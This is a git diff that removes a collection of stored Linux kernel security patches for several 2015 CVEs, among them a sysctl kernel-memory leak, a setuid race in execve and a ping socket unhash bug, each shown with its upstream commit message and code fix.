diff --git a/Patches/Linux_CVEs/CVE-2015-2041/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2015-2041/3.2/0001.patch
deleted file mode 100644
index 5cf3aecf..00000000
--- a/Patches/Linux_CVEs/CVE-2015-2041/3.2/0001.patch
+++ /dev/null
@@ -1,58 +0,0 @@
-From 88fe14be08a475ad0eea4ca7c51f32437baf41af Mon Sep 17 00:00:00 2001
-From: Sasha Levin <sasha.levin@oracle.com>
-Date: Fri, 23 Jan 2015 20:47:00 -0500
-Subject: net: llc: use correct size for sysctl timeout entries
-
-commit 6b8d9117ccb4f81b1244aafa7bc70ef8fa45fc49 upstream.
-
-The timeout entries are sizeof(int) rather than sizeof(long), which
-means that when they were getting read we'd also leak kernel memory
-to userspace along with the timeout values.
-
-Signed-off-by: Sasha Levin <sasha.levin@oracle.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- net/llc/sysctl_net_llc.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/net/llc/sysctl_net_llc.c b/net/llc/sysctl_net_llc.c
-index e2ebe35..be078ec 100644
---- a/net/llc/sysctl_net_llc.c
-+++ b/net/llc/sysctl_net_llc.c
-@@ -17,28 +17,28 @@ static struct ctl_table llc2_timeout_table[] = {
- 	{
- 		.procname	= "ack",
- 		.data		= &sysctl_llc2_ack_timeout,
--		.maxlen		= sizeof(long),
-+		.maxlen		= sizeof(sysctl_llc2_ack_timeout),
- 		.mode		= 0644,
- 		.proc_handler   = proc_dointvec_jiffies,
- 	},
- 	{
- 		.procname	= "busy",
- 		.data		= &sysctl_llc2_busy_timeout,
--		.maxlen		= sizeof(long),
-+		.maxlen		= sizeof(sysctl_llc2_busy_timeout),
- 		.mode		= 0644,
- 		.proc_handler   = proc_dointvec_jiffies,
- 	},
- 	{
- 		.procname	= "p",
- 		.data		= &sysctl_llc2_p_timeout,
--		.maxlen		= sizeof(long),
-+		.maxlen		= sizeof(sysctl_llc2_p_timeout),
- 		.mode		= 0644,
- 		.proc_handler   = proc_dointvec_jiffies,
- 	},
- 	{
- 		.procname	= "rej",
- 		.data		= &sysctl_llc2_rej_timeout,
--		.maxlen		= sizeof(long),
-+		.maxlen		= sizeof(sysctl_llc2_rej_timeout),
- 		.mode		= 0644,
- 		.proc_handler   = proc_dointvec_jiffies,
- 	},
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-2041/^3.19/0002.patch b/Patches/Linux_CVEs/CVE-2015-2041/^3.19/0002.patch
deleted file mode 100644
index cabfc50a..00000000
--- a/Patches/Linux_CVEs/CVE-2015-2041/^3.19/0002.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 6b8d9117ccb4f81b1244aafa7bc70ef8fa45fc49 Mon Sep 17 00:00:00 2001
-From: Sasha Levin <sasha.levin@oracle.com>
-Date: Fri, 23 Jan 2015 20:47:00 -0500
-Subject: [PATCH] net: llc: use correct size for sysctl timeout entries
-
-The timeout entries are sizeof(int) rather than sizeof(long), which
-means that when they were getting read we'd also leak kernel memory
-to userspace along with the timeout values.
-
-Signed-off-by: Sasha Levin <sasha.levin@oracle.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/llc/sysctl_net_llc.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/net/llc/sysctl_net_llc.c b/net/llc/sysctl_net_llc.c
-index 612a5ddaf93b1..799bafc2af39e 100644
---- a/net/llc/sysctl_net_llc.c
-+++ b/net/llc/sysctl_net_llc.c
-@@ -18,28 +18,28 @@ static struct ctl_table llc2_timeout_table[] = {
- 	{
- 		.procname	= "ack",
- 		.data		= &sysctl_llc2_ack_timeout,
--		.maxlen		= sizeof(long),
-+		.maxlen		= sizeof(sysctl_llc2_ack_timeout),
- 		.mode		= 0644,
- 		.proc_handler   = proc_dointvec_jiffies,
- 	},
- 	{
- 		.procname	= "busy",
- 		.data		= &sysctl_llc2_busy_timeout,
--		.maxlen		= sizeof(long),
-+		.maxlen		= sizeof(sysctl_llc2_busy_timeout),
- 		.mode		= 0644,
- 		.proc_handler   = proc_dointvec_jiffies,
- 	},
- 	{
- 		.procname	= "p",
- 		.data		= &sysctl_llc2_p_timeout,
--		.maxlen		= sizeof(long),
-+		.maxlen		= sizeof(sysctl_llc2_p_timeout),
- 		.mode		= 0644,
- 		.proc_handler   = proc_dointvec_jiffies,
- 	},
- 	{
- 		.procname	= "rej",
- 		.data		= &sysctl_llc2_rej_timeout,
--		.maxlen		= sizeof(long),
-+		.maxlen		= sizeof(sysctl_llc2_rej_timeout),
- 		.mode		= 0644,
- 		.proc_handler   = proc_dointvec_jiffies,
- 	},
diff --git a/Patches/Linux_CVEs/CVE-2015-2686/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-2686/ANY/0001.patch
deleted file mode 100644
index a8e5e83a..00000000
--- a/Patches/Linux_CVEs/CVE-2015-2686/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 4de930efc23b92ddf88ce91c405ee645fe6e27ea Mon Sep 17 00:00:00 2001
-From: Al Viro <viro@ZenIV.linux.org.uk>
-Date: Fri, 20 Mar 2015 17:41:43 +0000
-Subject: net: validate the range we feed to iov_iter_init() in
- sys_sendto/sys_recvfrom
-
-Cc: stable@vger.kernel.org # v3.19
-Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/socket.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/net/socket.c b/net/socket.c
-index bbedbfc..245330c 100644
---- a/net/socket.c
-+++ b/net/socket.c
-@@ -1702,6 +1702,8 @@ SYSCALL_DEFINE6(sendto, int, fd, void __user *, buff, size_t, len,
- 
- 	if (len > INT_MAX)
- 		len = INT_MAX;
-+	if (unlikely(!access_ok(VERIFY_READ, buff, len)))
-+		return -EFAULT;
- 	sock = sockfd_lookup_light(fd, &err, &fput_needed);
- 	if (!sock)
- 		goto out;
-@@ -1760,6 +1762,8 @@ SYSCALL_DEFINE6(recvfrom, int, fd, void __user *, ubuf, size_t, size,
- 
- 	if (size > INT_MAX)
- 		size = INT_MAX;
-+	if (unlikely(!access_ok(VERIFY_WRITE, ubuf, size)))
-+		return -EFAULT;
- 	sock = sockfd_lookup_light(fd, &err, &fput_needed);
- 	if (!sock)
- 		goto out;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-2922/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-2922/ANY/0001.patch
deleted file mode 100644
index 6d201090..00000000
--- a/Patches/Linux_CVEs/CVE-2015-2922/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 6fd99094de2b83d1d4c8457f2c83483b2828e75a Mon Sep 17 00:00:00 2001
-From: "D.S. Ljungmark" <ljungmark@modio.se>
-Date: Wed, 25 Mar 2015 09:28:15 +0100
-Subject: ipv6: Don't reduce hop limit for an interface
-
-A local route may have a lower hop_limit set than global routes do.
-
-RFC 3756, Section 4.2.7, "Parameter Spoofing"
-
->   1.  The attacker includes a Current Hop Limit of one or another small
->       number which the attacker knows will cause legitimate packets to
->       be dropped before they reach their destination.
-
->   As an example, one possible approach to mitigate this threat is to
->   ignore very small hop limits.  The nodes could implement a
->   configurable minimum hop limit, and ignore attempts to set it below
->   said limit.
-
-Signed-off-by: D.S. Ljungmark <ljungmark@modio.se>
-Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv6/ndisc.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/net/ipv6/ndisc.c b/net/ipv6/ndisc.c
-index 471ed24..14ecdaf 100644
---- a/net/ipv6/ndisc.c
-+++ b/net/ipv6/ndisc.c
-@@ -1218,7 +1218,14 @@ static void ndisc_router_discovery(struct sk_buff *skb)
- 	if (rt)
- 		rt6_set_expires(rt, jiffies + (HZ * lifetime));
- 	if (ra_msg->icmph.icmp6_hop_limit) {
--		in6_dev->cnf.hop_limit = ra_msg->icmph.icmp6_hop_limit;
-+		/* Only set hop_limit on the interface if it is higher than
-+		 * the current hop_limit.
-+		 */
-+		if (in6_dev->cnf.hop_limit < ra_msg->icmph.icmp6_hop_limit) {
-+			in6_dev->cnf.hop_limit = ra_msg->icmph.icmp6_hop_limit;
-+		} else {
-+			ND_PRINTK(2, warn, "RA: Got route advertisement with lower hop_limit than current\n");
-+		}
- 		if (rt)
- 			dst_metric_set(&rt->dst, RTAX_HOPLIMIT,
- 				       ra_msg->icmph.icmp6_hop_limit);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-3288/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-3288/ANY/0001.patch
deleted file mode 100644
index a140407e..00000000
--- a/Patches/Linux_CVEs/CVE-2015-3288/ANY/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From 6b7339f4c31ad69c8e9c0b2859276e22cf72176d Mon Sep 17 00:00:00 2001
-From: "Kirill A. Shutemov" <kirill.shutemov@linux.intel.com>
-Date: Mon, 6 Jul 2015 23:18:37 +0300
-Subject: mm: avoid setting up anonymous pages into file mapping
-
-Reading page fault handler code I've noticed that under right
-circumstances kernel would map anonymous pages into file mappings: if
-the VMA doesn't have vm_ops->fault() and the VMA wasn't fully populated
-on ->mmap(), kernel would handle page fault to not populated pte with
-do_anonymous_page().
-
-Let's change page fault handler to use do_anonymous_page() only on
-anonymous VMA (->vm_ops == NULL) and make sure that the VMA is not
-shared.
-
-For file mappings without vm_ops->fault() or shred VMA without vm_ops,
-page fault on pte_none() entry would lead to SIGBUS.
-
-Signed-off-by: Kirill A. Shutemov <kirill.shutemov@linux.intel.com>
-Acked-by: Oleg Nesterov <oleg@redhat.com>
-Cc: Andrew Morton <akpm@linux-foundation.org>
-Cc: Willy Tarreau <w@1wt.eu>
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- mm/memory.c | 20 +++++++++++++-------
- 1 file changed, 13 insertions(+), 7 deletions(-)
-
-diff --git a/mm/memory.c b/mm/memory.c
-index a84fbb7..388dcf9 100644
---- a/mm/memory.c
-+++ b/mm/memory.c
-@@ -2670,6 +2670,10 @@ static int do_anonymous_page(struct mm_struct *mm, struct vm_area_struct *vma,
- 
- 	pte_unmap(page_table);
- 
-+	/* File mapping without ->vm_ops ? */
-+	if (vma->vm_flags & VM_SHARED)
-+		return VM_FAULT_SIGBUS;
-+
- 	/* Check if we need to add a guard page to the stack */
- 	if (check_stack_guard_page(vma, address) < 0)
- 		return VM_FAULT_SIGSEGV;
-@@ -3099,6 +3103,9 @@ static int do_fault(struct mm_struct *mm, struct vm_area_struct *vma,
- 			- vma->vm_start) >> PAGE_SHIFT) + vma->vm_pgoff;
- 
- 	pte_unmap(page_table);
-+	/* The VMA was not fully populated on mmap() or missing VM_DONTEXPAND */
-+	if (!vma->vm_ops->fault)
-+		return VM_FAULT_SIGBUS;
- 	if (!(flags & FAULT_FLAG_WRITE))
- 		return do_read_fault(mm, vma, address, pmd, pgoff, flags,
- 				orig_pte);
-@@ -3244,13 +3251,12 @@ static int handle_pte_fault(struct mm_struct *mm,
- 	barrier();
- 	if (!pte_present(entry)) {
- 		if (pte_none(entry)) {
--			if (vma->vm_ops) {
--				if (likely(vma->vm_ops->fault))
--					return do_fault(mm, vma, address, pte,
--							pmd, flags, entry);
--			}
--			return do_anonymous_page(mm, vma, address,
--						 pte, pmd, flags);
-+			if (vma->vm_ops)
-+				return do_fault(mm, vma, address, pte, pmd,
-+						flags, entry);
-+
-+			return do_anonymous_page(mm, vma, address, pte, pmd,
-+					flags);
- 		}
- 		return do_swap_page(mm, vma, address,
- 					pte, pmd, flags, entry);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-3339/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2015-3339/3.2/0001.patch
deleted file mode 100644
index f1e7d799..00000000
--- a/Patches/Linux_CVEs/CVE-2015-3339/3.2/0001.patch
+++ /dev/null
@@ -1,116 +0,0 @@
-From 470e517be17dd6ef8670bec7bd7831ea0d3ad8a6 Mon Sep 17 00:00:00 2001
-From: Jann Horn <jann@thejh.net>
-Date: Sun, 19 Apr 2015 02:48:39 +0200
-Subject: fs: take i_mutex during prepare_binprm for set[ug]id executables
-
-commit 8b01fc86b9f425899f8a3a8fc1c47d73c2c20543 upstream.
-
-This prevents a race between chown() and execve(), where chowning a
-setuid-user binary to root would momentarily make the binary setuid
-root.
-
-This patch was mostly written by Linus Torvalds.
-
-Signed-off-by: Jann Horn <jann@thejh.net>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-[bwh: Backported to 3.2:
- - Drop the task_no_new_privs() and user namespace checks
- - Open-code file_inode()
- - s/READ_ONCE/ACCESS_ONCE/
- - Adjust context]
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- fs/exec.c | 65 +++++++++++++++++++++++++++++++++++++++------------------------
- 1 file changed, 40 insertions(+), 25 deletions(-)
-
-diff --git a/fs/exec.c b/fs/exec.c
-index 78199eb..7adb43f 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1282,6 +1282,45 @@ int check_unsafe_exec(struct linux_binprm *bprm)
- 	return res;
- }
- 
-+static void bprm_fill_uid(struct linux_binprm *bprm)
-+{
-+	struct inode *inode;
-+	unsigned int mode;
-+	uid_t uid;
-+	gid_t gid;
-+
-+	/* clear any previous set[ug]id data from a previous binary */
-+	bprm->cred->euid = current_euid();
-+	bprm->cred->egid = current_egid();
-+
-+	if (bprm->file->f_path.mnt->mnt_flags & MNT_NOSUID)
-+		return;
-+
-+	inode = bprm->file->f_path.dentry->d_inode;
-+	mode = ACCESS_ONCE(inode->i_mode);
-+	if (!(mode & (S_ISUID|S_ISGID)))
-+		return;
-+
-+	/* Be careful if suid/sgid is set */
-+	mutex_lock(&inode->i_mutex);
-+
-+	/* reload atomically mode/uid/gid now that lock held */
-+	mode = inode->i_mode;
-+	uid = inode->i_uid;
-+	gid = inode->i_gid;
-+	mutex_unlock(&inode->i_mutex);
-+
-+	if (mode & S_ISUID) {
-+		bprm->per_clear |= PER_CLEAR_ON_SETID;
-+		bprm->cred->euid = uid;
-+	}
-+
-+	if ((mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP)) {
-+		bprm->per_clear |= PER_CLEAR_ON_SETID;
-+		bprm->cred->egid = gid;
-+	}
-+}
-+
- /* 
-  * Fill the binprm structure from the inode. 
-  * Check permissions, then read the first 128 (BINPRM_BUF_SIZE) bytes
-@@ -1290,36 +1329,12 @@ int check_unsafe_exec(struct linux_binprm *bprm)
-  */
- int prepare_binprm(struct linux_binprm *bprm)
- {
--	umode_t mode;
--	struct inode * inode = bprm->file->f_path.dentry->d_inode;
- 	int retval;
- 
--	mode = inode->i_mode;
- 	if (bprm->file->f_op == NULL)
- 		return -EACCES;
- 
--	/* clear any previous set[ug]id data from a previous binary */
--	bprm->cred->euid = current_euid();
--	bprm->cred->egid = current_egid();
--
--	if (!(bprm->file->f_path.mnt->mnt_flags & MNT_NOSUID)) {
--		/* Set-uid? */
--		if (mode & S_ISUID) {
--			bprm->per_clear |= PER_CLEAR_ON_SETID;
--			bprm->cred->euid = inode->i_uid;
--		}
--
--		/* Set-gid? */
--		/*
--		 * If setgid is set but no group execute bit then this
--		 * is a candidate for mandatory locking, not a setgid
--		 * executable.
--		 */
--		if ((mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP)) {
--			bprm->per_clear |= PER_CLEAR_ON_SETID;
--			bprm->cred->egid = inode->i_gid;
--		}
--	}
-+	bprm_fill_uid(bprm);
- 
- 	/* fill in binprm security blob */
- 	retval = security_bprm_set_creds(bprm);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-3339/^3.19/0002.patch b/Patches/Linux_CVEs/CVE-2015-3339/^3.19/0002.patch
deleted file mode 100644
index 5aef49e7..00000000
--- a/Patches/Linux_CVEs/CVE-2015-3339/^3.19/0002.patch
+++ /dev/null
@@ -1,114 +0,0 @@
-From 8b01fc86b9f425899f8a3a8fc1c47d73c2c20543 Mon Sep 17 00:00:00 2001
-From: Jann Horn <jann@thejh.net>
-Date: Sun, 19 Apr 2015 02:48:39 +0200
-Subject: [PATCH] fs: take i_mutex during prepare_binprm for set[ug]id
- executables
-
-This prevents a race between chown() and execve(), where chowning a
-setuid-user binary to root would momentarily make the binary setuid
-root.
-
-This patch was mostly written by Linus Torvalds.
-
-Signed-off-by: Jann Horn <jann@thejh.net>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- fs/exec.c | 76 ++++++++++++++++++++++++++++++++++++++++-----------------------
- 1 file changed, 48 insertions(+), 28 deletions(-)
-
-diff --git a/fs/exec.c b/fs/exec.c
-index 02bfd980a40c7..49a1c61433b73 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1275,6 +1275,53 @@ static void check_unsafe_exec(struct linux_binprm *bprm)
- 	spin_unlock(&p->fs->lock);
- }
- 
-+static void bprm_fill_uid(struct linux_binprm *bprm)
-+{
-+	struct inode *inode;
-+	unsigned int mode;
-+	kuid_t uid;
-+	kgid_t gid;
-+
-+	/* clear any previous set[ug]id data from a previous binary */
-+	bprm->cred->euid = current_euid();
-+	bprm->cred->egid = current_egid();
-+
-+	if (bprm->file->f_path.mnt->mnt_flags & MNT_NOSUID)
-+		return;
-+
-+	if (task_no_new_privs(current))
-+		return;
-+
-+	inode = file_inode(bprm->file);
-+	mode = READ_ONCE(inode->i_mode);
-+	if (!(mode & (S_ISUID|S_ISGID)))
-+		return;
-+
-+	/* Be careful if suid/sgid is set */
-+	mutex_lock(&inode->i_mutex);
-+
-+	/* reload atomically mode/uid/gid now that lock held */
-+	mode = inode->i_mode;
-+	uid = inode->i_uid;
-+	gid = inode->i_gid;
-+	mutex_unlock(&inode->i_mutex);
-+
-+	/* We ignore suid/sgid if there are no mappings for them in the ns */
-+	if (!kuid_has_mapping(bprm->cred->user_ns, uid) ||
-+		 !kgid_has_mapping(bprm->cred->user_ns, gid))
-+		return;
-+
-+	if (mode & S_ISUID) {
-+		bprm->per_clear |= PER_CLEAR_ON_SETID;
-+		bprm->cred->euid = uid;
-+	}
-+
-+	if ((mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP)) {
-+		bprm->per_clear |= PER_CLEAR_ON_SETID;
-+		bprm->cred->egid = gid;
-+	}
-+}
-+
- /*
-  * Fill the binprm structure from the inode.
-  * Check permissions, then read the first 128 (BINPRM_BUF_SIZE) bytes
-@@ -1283,36 +1330,9 @@ static void check_unsafe_exec(struct linux_binprm *bprm)
-  */
- int prepare_binprm(struct linux_binprm *bprm)
- {
--	struct inode *inode = file_inode(bprm->file);
--	umode_t mode = inode->i_mode;
- 	int retval;
- 
--
--	/* clear any previous set[ug]id data from a previous binary */
--	bprm->cred->euid = current_euid();
--	bprm->cred->egid = current_egid();
--
--	if (!(bprm->file->f_path.mnt->mnt_flags & MNT_NOSUID) &&
--	    !task_no_new_privs(current) &&
--	    kuid_has_mapping(bprm->cred->user_ns, inode->i_uid) &&
--	    kgid_has_mapping(bprm->cred->user_ns, inode->i_gid)) {
--		/* Set-uid? */
--		if (mode & S_ISUID) {
--			bprm->per_clear |= PER_CLEAR_ON_SETID;
--			bprm->cred->euid = inode->i_uid;
--		}
--
--		/* Set-gid? */
--		/*
--		 * If setgid is set but no group execute bit then this
--		 * is a candidate for mandatory locking, not a setgid
--		 * executable.
--		 */
--		if ((mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP)) {
--			bprm->per_clear |= PER_CLEAR_ON_SETID;
--			bprm->cred->egid = inode->i_gid;
--		}
--	}
-+	bprm_fill_uid(bprm);
- 
- 	/* fill in binprm security blob */
- 	retval = security_bprm_set_creds(bprm);
diff --git a/Patches/Linux_CVEs/CVE-2015-3636/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-3636/ANY/0001.patch
deleted file mode 100644
index 86cee79c..00000000
--- a/Patches/Linux_CVEs/CVE-2015-3636/ANY/0001.patch
+++ /dev/null
@@ -1,29 +0,0 @@
-From a134f083e79fb4c3d0a925691e732c56911b4326 Mon Sep 17 00:00:00 2001
-From: "David S. Miller" <davem@davemloft.net>
-Date: Fri, 1 May 2015 22:02:47 -0400
-Subject: [PATCH] ipv4: Missing sk_nulls_node_init() in ping_unhash().
-
-If we don't do that, then the poison value is left in the ->pprev
-backlink.
-
-This can cause crashes if we do a disconnect, followed by a connect().
-
-Tested-by: Linus Torvalds <torvalds@linux-foundation.org>
-Reported-by: Wen Xu <hotdog3645@gmail.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv4/ping.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/net/ipv4/ping.c b/net/ipv4/ping.c
-index a93f260cf24ca..05ff44b758dfe 100644
---- a/net/ipv4/ping.c
-+++ b/net/ipv4/ping.c
-@@ -158,6 +158,7 @@ void ping_unhash(struct sock *sk)
- 	if (sk_hashed(sk)) {
- 		write_lock_bh(&ping_table.lock);
- 		hlist_nulls_del(&sk->sk_nulls_node);
-+		sk_nulls_node_init(&sk->sk_nulls_node);
- 		sock_put(sk);
- 		isk->inet_num = 0;
- 		isk->inet_sport = 0;
diff --git a/Patches/Linux_CVEs/CVE-2015-4170/3.10^/0001.patch b/Patches/Linux_CVEs/CVE-2015-4170/3.10^/0001.patch
deleted file mode 100644
index eced29e8..00000000
--- a/Patches/Linux_CVEs/CVE-2015-4170/3.10^/0001.patch
+++ /dev/null
@@ -1,121 +0,0 @@
-From cf872776fc84128bb779ce2b83a37c884c3203ae Mon Sep 17 00:00:00 2001
-From: Peter Hurley <peter@hurleysoftware.com>
-Date: Wed, 11 Dec 2013 21:11:58 -0500
-Subject: tty: Fix hang at ldsem_down_read()
-
-When a controlling tty is being hung up and the hang up is
-waiting for a just-signalled tty reader or writer to exit, and a new tty
-reader/writer tries to acquire an ldisc reference concurrently with the
-ldisc reference release from the signalled reader/writer, the hangup
-can hang. The new reader/writer is sleeping in ldsem_down_read() and the
-hangup is sleeping in ldsem_down_write() [1].
-
-The new reader/writer fails to wakeup the waiting hangup because the
-wrong lock count value is checked (the old lock count rather than the new
-lock count) to see if the lock is unowned.
-
-Change helper function to return the new lock count if the cmpxchg was
-successful; document this behavior.
-
-[1] edited dmesg log from reporter
-
-SysRq : Show Blocked State
-  task                        PC stack   pid father
-systemd         D ffff88040c4f0000     0     1      0 0x00000000
- ffff88040c49fbe0 0000000000000046 ffff88040c4a0000 ffff88040c49ffd8
- 00000000001d3980 00000000001d3980 ffff88040c4a0000 ffff88040593d840
- ffff88040c49fb40 ffffffff810a4cc0 0000000000000006 0000000000000023
-Call Trace:
- [<ffffffff810a4cc0>] ? sched_clock_cpu+0x9f/0xe4
- [<ffffffff810a4cc0>] ? sched_clock_cpu+0x9f/0xe4
- [<ffffffff810a4cc0>] ? sched_clock_cpu+0x9f/0xe4
- [<ffffffff810a4cc0>] ? sched_clock_cpu+0x9f/0xe4
- [<ffffffff817a6649>] schedule+0x24/0x5e
- [<ffffffff817a588b>] schedule_timeout+0x15b/0x1ec
- [<ffffffff810a4cc0>] ? sched_clock_cpu+0x9f/0xe4
- [<ffffffff817aa691>] ? _raw_spin_unlock_irq+0x24/0x26
- [<ffffffff817aa10c>] down_read_failed+0xe3/0x1b9
- [<ffffffff817aa26d>] ldsem_down_read+0x8b/0xa5
- [<ffffffff8142b5ca>] ? tty_ldisc_ref_wait+0x1b/0x44
- [<ffffffff8142b5ca>] tty_ldisc_ref_wait+0x1b/0x44
- [<ffffffff81423f5b>] tty_write+0x7d/0x28a
- [<ffffffff814241f5>] redirected_tty_write+0x8d/0x98
- [<ffffffff81424168>] ? tty_write+0x28a/0x28a
- [<ffffffff8115d03f>] do_loop_readv_writev+0x56/0x79
- [<ffffffff8115e604>] do_readv_writev+0x1b0/0x1ff
- [<ffffffff8116ea0b>] ? do_vfs_ioctl+0x32a/0x489
- [<ffffffff81167d9d>] ? final_putname+0x1d/0x3a
- [<ffffffff8115e6c7>] vfs_writev+0x2e/0x49
- [<ffffffff8115e7d3>] SyS_writev+0x47/0xaa
- [<ffffffff817ab822>] system_call_fastpath+0x16/0x1b
-bash            D ffffffff81c104c0     0  5469   5302 0x00000082
- ffff8800cf817ac0 0000000000000046 ffff8804086b22a0 ffff8800cf817fd8
- 00000000001d3980 00000000001d3980 ffff8804086b22a0 ffff8800cf817a48
- 000000000000b9a0 ffff8800cf817a78 ffffffff81004675 ffff8800cf817a44
-Call Trace:
- [<ffffffff81004675>] ? dump_trace+0x165/0x29c
- [<ffffffff810a4cc0>] ? sched_clock_cpu+0x9f/0xe4
- [<ffffffff8100edda>] ? save_stack_trace+0x26/0x41
- [<ffffffff817a6649>] schedule+0x24/0x5e
- [<ffffffff817a588b>] schedule_timeout+0x15b/0x1ec
- [<ffffffff810a4cc0>] ? sched_clock_cpu+0x9f/0xe4
- [<ffffffff817a9f03>] ? down_write_failed+0xa3/0x1c9
- [<ffffffff817aa691>] ? _raw_spin_unlock_irq+0x24/0x26
- [<ffffffff817a9f0b>] down_write_failed+0xab/0x1c9
- [<ffffffff817aa300>] ldsem_down_write+0x79/0xb1
- [<ffffffff817aada3>] ? tty_ldisc_lock_pair_timeout+0xa5/0xd9
- [<ffffffff817aada3>] tty_ldisc_lock_pair_timeout+0xa5/0xd9
- [<ffffffff8142bf33>] tty_ldisc_hangup+0xc4/0x218
- [<ffffffff81423ab3>] __tty_hangup+0x2e2/0x3ed
- [<ffffffff81424a76>] disassociate_ctty+0x63/0x226
- [<ffffffff81078aa7>] do_exit+0x79f/0xa11
- [<ffffffff81086bdb>] ? get_signal_to_deliver+0x206/0x62f
- [<ffffffff810b4bfb>] ? lock_release_holdtime.part.8+0xf/0x16e
- [<ffffffff81079b05>] do_group_exit+0x47/0xb5
- [<ffffffff81086c16>] get_signal_to_deliver+0x241/0x62f
- [<ffffffff810020a7>] do_signal+0x43/0x59d
- [<ffffffff810f2af7>] ? __audit_syscall_exit+0x21a/0x2a8
- [<ffffffff810b4bfb>] ? lock_release_holdtime.part.8+0xf/0x16e
- [<ffffffff81002655>] do_notify_resume+0x54/0x6c
- [<ffffffff817abaf8>] int_signal+0x12/0x17
-
-Reported-by: Sami Farin <sami.farin@gmail.com>
-Cc: <stable@vger.kernel.org> # 3.12.x
-Signed-off-by: Peter Hurley <peter@hurleysoftware.com>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/tty/tty_ldsem.c | 16 +++++++++++++---
- 1 file changed, 13 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/tty/tty_ldsem.c b/drivers/tty/tty_ldsem.c
-index 22fad8a..d8a55e8 100644
---- a/drivers/tty/tty_ldsem.c
-+++ b/drivers/tty/tty_ldsem.c
-@@ -86,11 +86,21 @@ static inline long ldsem_atomic_update(long delta, struct ld_semaphore *sem)
- 	return atomic_long_add_return(delta, (atomic_long_t *)&sem->count);
- }
- 
-+/*
-+ * ldsem_cmpxchg() updates @*old with the last-known sem->count value.
-+ * Returns 1 if count was successfully changed; @*old will have @new value.
-+ * Returns 0 if count was not changed; @*old will have most recent sem->count
-+ */
- static inline int ldsem_cmpxchg(long *old, long new, struct ld_semaphore *sem)
- {
--	long tmp = *old;
--	*old = atomic_long_cmpxchg(&sem->count, *old, new);
--	return *old == tmp;
-+	long tmp = atomic_long_cmpxchg(&sem->count, *old, new);
-+	if (tmp == *old) {
-+		*old = new;
-+		return 1;
-+	} else {
-+		*old = tmp;
-+		return 0;
-+	}
- }
- 
- /*
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-4177/4.0/0001.patch b/Patches/Linux_CVEs/CVE-2015-4177/4.0/0001.patch
deleted file mode 100644
index c56630e2..00000000
--- a/Patches/Linux_CVEs/CVE-2015-4177/4.0/0001.patch
+++ /dev/null
@@ -1,46 +0,0 @@
-From cd4a40174b71acd021877341684d8bb1dc8ea4ae Mon Sep 17 00:00:00 2001
-From: "Eric W. Biederman" <ebiederm@xmission.com>
-Date: Wed, 7 Jan 2015 14:28:26 -0600
-Subject: [PATCH] mnt: Fail collect_mounts when applied to unmounted mounts
-
-The only users of collect_mounts are in audit_tree.c
-
-In audit_trim_trees and audit_add_tree_rule the path passed into
-collect_mounts is generated from kern_path passed an audit_tree
-pathname which is guaranteed to be an absolute path.   In those cases
-collect_mounts is obviously intended to work on mounted paths and
-if a race results in paths that are unmounted when collect_mounts
-it is reasonable to fail early.
-
-The paths passed into audit_tag_tree don't have the absolute path
-check.  But are used to play with fsnotify and otherwise interact with
-the audit_trees, so again operating only on mounted paths appears
-reasonable.
-
-Avoid having to worry about what happens when we try and audit
-unmounted filesystems by restricting collect_mounts to mounts
-that appear in the mount tree.
-
-Signed-off-by: "Eric W. Biederman" <ebiederm@xmission.com>
----
- fs/namespace.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/fs/namespace.c b/fs/namespace.c
-index 2b12b7a9455d0..acc5583764dc0 100644
---- a/fs/namespace.c
-+++ b/fs/namespace.c
-@@ -1669,8 +1669,11 @@ struct vfsmount *collect_mounts(struct path *path)
- {
- 	struct mount *tree;
- 	namespace_lock();
--	tree = copy_tree(real_mount(path->mnt), path->dentry,
--			 CL_COPY_ALL | CL_PRIVATE);
-+	if (!check_mnt(real_mount(path->mnt)))
